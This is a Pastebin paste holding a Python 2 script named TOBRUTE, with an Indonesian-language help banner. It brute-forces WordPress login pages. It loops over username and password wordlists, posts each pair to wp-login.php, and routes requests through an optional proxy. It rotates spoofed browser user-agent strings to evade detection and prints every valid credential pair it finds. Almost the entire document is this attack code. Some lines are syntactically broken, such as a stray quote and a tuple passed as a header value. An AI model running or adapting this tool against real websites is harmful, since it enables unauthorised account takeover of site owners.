API tools faq
paste
Advertisement
Guest User

TOBRUTE

a guest
Sep 30th, 2017
409
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.25 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. import sys
  4. import urllib2, urllib
  5. import cookielib
  6. import re
  7.  
  8. #
  9. #functions
  10. #
  11.  
  12. def loadLst(fileName, lstName):
  13. f = open(fileName, 'r')
  14. for line in f:
  15. lstName.append(line.replace('\r\n',''))
  16. f.close()
  17.  
  18. if len(sys.argv) <= 1:
  19. print 'TOBRUTE untuk brute wordpress by 4RS!M3R''
  20. print 'Email:ilzamarsimer@yahoo.com'
  21. print ''
  22. print ''
  23. print 'Menu:'
  24. print '-h URL'
  25. print '-U file contain list user'
  26. print '-P file contain list password'
  27. print '-u username'
  28. print '-p password'
  29. print '-v verbose mode / show login + pass kombinasi untuk setiap percobaan '
  30. print '-f lanjutkan setelah ditemukan login / password pair'
  31. print '-g user-agent'
  32. print '-x use proxy '
  33. print ''
  34. print 'Contoh: xxx.py -h http://xxx.com/wp-login.php/halaman login -u admin -P password.txt'
  35. sys.exit()
  36.  
  37. print 'TOBRUTE untuk brute wordpress by 4RS!M3R'
  38. #
  39. #define variables
  40. #
  41.  
  42. print ""
  43.  
  44. url = ''
  45. wordlist = ''
  46. username = ''
  47. password = ''
  48. passFile = ''
  49. userFile = ''
  50. signal = 'type="password"'
  51. count = 0
  52. countAcc = 0
  53. mode = 1
  54. verbose = 0
  55. useProxy = 0
  56. continues = 0
  57. agent = "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0",
  58. "Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
  59. "Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
  60. "Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
  61. "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
  62. "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
  63. "Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
  64. "Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
  65. "Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
  66. "Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
  67. "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  68. "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
  69. "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
  70. "Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
  71. "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  72. "Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
  73. "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
  74. "Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  75. "Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0",
  76. "Mozilla/5.0 (U; Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
  77. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2",
  78. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2",
  79. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
  80. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
  81. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
  82. "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
  83. "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.803.0 Chrome/14.0.803.0 Safari/535.1",
  84. "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
  85. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
  86. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
  87. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1",
  88. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  89. "Mozilla/5.0 ArchLinux (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  90. "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/13.0.782.41 Chrome/13.0.782.41 Safari/535.1",
  91. "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  92. "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  93. "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  94. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  95. "Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  96. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  97. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  98. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  99. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1",
  100. "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
  101. "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
  102. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)",
  103. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)",
  104. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7",
  105. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)",
  106. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)",
  107. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
  108. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
  109. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)",
  110. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0",
  111. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)",
  112. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)",
  113. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  114. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/13.0.782.215)",
  115. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)",
  116. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205",
  117. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
  118. "Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  119. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  120. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
  121. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)",
  122. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)",
  123. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)",
  124. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
  125. "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)"
  126. result = ""
  127. #
  128. #check argvs
  129. #
  130. for arg in sys.argv:
  131. if arg == '-h':
  132. url = sys.argv[count + 1]
  133. elif arg == '-u':
  134. username = sys.argv[count + 1]
  135. elif arg == '-U':
  136. userFile = sys.argv[count + 1]
  137. elif arg == '-p':
  138. password = sys.argv[count + 1]
  139. elif arg == '-P':
  140. passFile = sys.argv[count + 1]
  141. elif arg == '-v':
  142. verbose = 1
  143. elif arg == '-s':
  144. signal = sys.argv[count + 1]
  145. elif arg == '-g':
  146. agent = sys.argv[count + 1]
  147. elif arg == '-x':
  148. lstTmp = sys.argv[count+1].split(':')
  149. proxyHandler = urllib2.ProxyHandler({lstTmp[0] : lstTmp[1]+':'+lstTmp[2]})
  150. useProxy = 1
  151. elif arg == '-f':
  152. continues = 1
  153. count += 1
  154.  
  155.  
  156. if (len(username)>0 and len(password)>0):
  157. mode = 1 #single
  158. elif (len(username)>0 and len(passFile)>0):
  159. mode = 2 #
  160. elif (len(userFile)>0 and len(password)>0):
  161. mode = 3
  162. elif (len(userFile)>0 and len(passFile)>0):
  163. mode = 4
  164.  
  165. #
  166. #init opener
  167. #
  168. cookieJar = cookielib.CookieJar()
  169. cookieHandler = urllib2.HTTPCookieProcessor(cookieJar)
  170. if useProxy == 0:
  171. opener = urllib2.build_opener(cookieHandler)
  172. else:
  173. opener = urllib2.build_opener(proxyHandler,cookieHandler)
  174. opener.addheaders = [('User-agent', agent)]
  175. cookieJar.clear()
  176. cookieJar.clear_session_cookies()
  177.  
  178. #
  179. #main
  180. #
  181. try:
  182. response = opener.open(url)
  183. content = response.read()
  184. if mode == 1:
  185. values = {'log' : username,
  186. 'pwd' : password,
  187. 'wp-submit' : 'Log In',
  188. 'redirect_to' : '',
  189. 'testcookie' : '1' }
  190. data = urllib.urlencode(values)
  191. print data
  192. response = opener.open(url+'/', data)
  193. strTmp = response.read()
  194. if strTmp.find(signal) < 0:
  195. countAcc += 1
  196. result += "username: " + username + " password: " + password + "\n"
  197. print "Valid user--pass: " + username + " -- " + password
  198. f3 = open('test.html','w')
  199. f3.write(strTmp)
  200. f3.close()
  201.  
  202.  
  203.  
  204. if mode == 2:
  205. f = open(passFile,'r')
  206. for line in f:
  207. password = line.strip('\n\r')
  208. values = {'log' : username,
  209. 'pwd' : password,
  210. 'wp-submit' : 'Log In',
  211. 'redirect_to' : '',
  212. 'testcookie' : '1' }
  213. if verbose == 1:
  214. print "Trying u--p : " + username + " -- " + password
  215. data = urllib.urlencode(values)
  216. try:
  217. response = opener.open(url+'/', data)
  218. except urllib2.URLError, e:
  219. continue
  220. strTmp = response.read()
  221. if strTmp.find(signal) < 0:
  222. countAcc += 1
  223. result += "username: " + username + " password: " + password + "\n"
  224. print "Valid user--pass: " + username + " -- " + password
  225. break;
  226.  
  227.  
  228.  
  229. if mode == 3:
  230. f = open(userFile,'r')
  231. for line in f:
  232. username = line.strip('\n\r')
  233. values = {'log' : username,
  234. 'pwd' : password,
  235. 'wp-submit' : 'Log In',
  236. 'redirect_to' : '',
  237. 'testcookie' : '1' }
  238. if verbose == 1:
  239. print "Trying u--p : " + username + " -- " + password
  240. data = urllib.urlencode(values)
  241. try:
  242. response = opener.open(url+'/', data)
  243. except urllib2.URLError, e:
  244. continue
  245. strTmp = response.read()
  246. if strTmp.find(signal) < 0:
  247. countAcc += 1
  248. result += "username: " + username + " password: " + password + "\n"
  249. print "Valid user--pass: " + username + " -- " + password
  250. if continues == 0:
  251. break
  252. cookieJar.clear()
  253. cookieJar.clear_session_cookies()
  254. response = opener.open(url)
  255. content = response.read()
  256.  
  257.  
  258.  
  259. if mode == 4:
  260. f = open(userFile,'r')
  261. f2 = open(passFile,'r')
  262. for line in f:
  263. username = line.strip('\n\r')
  264. f2.seek(0)
  265. for line2 in f2:
  266. password = line2.strip('\n\r')
  267. values = {'log' : username,
  268. 'pwd' : password,
  269. 'wp-submit' : 'Log In',
  270. 'redirect_to' : '',
  271. 'testcookie' : '1' }
  272. if verbose == 1:
  273. print "Trying u--p : " + username + " -- " + password
  274. data = urllib.urlencode(values)
  275. try:
  276. response = opener.open(url+'/', data)
  277. except urllib2.URLError, e:
  278. continue
  279. strTmp = response.read()
  280. if strTmp.find(signal) < 0:
  281. countAcc += 1
  282. result += "username: " + username + " password: " + password + "\n"
  283. print "Valid user--pass: " + username + " -- " + password
  284. if continues == 0:
  285. break;
  286. cookieJar.clear()
  287. cookieJar.clear_session_cookies()
  288. response = opener.open(url)
  289. content = response.read()
  290.  
  291. f.close()
  292. f2.close()
  293.  
  294. #Finish
  295. print ''
  296. print '1 target successfuly completed, '+ str(countAcc) +' valid username+password found'
  297. print 'TARGER: ' + url
  298. print 'RESULT:'
  299. print result
  300. sys.exit()
  301. except urllib2.URLError, e:
  302. print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
  303. except (KeyboardInterrupt):
  304. print "\n\t[!] Session cancelled"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!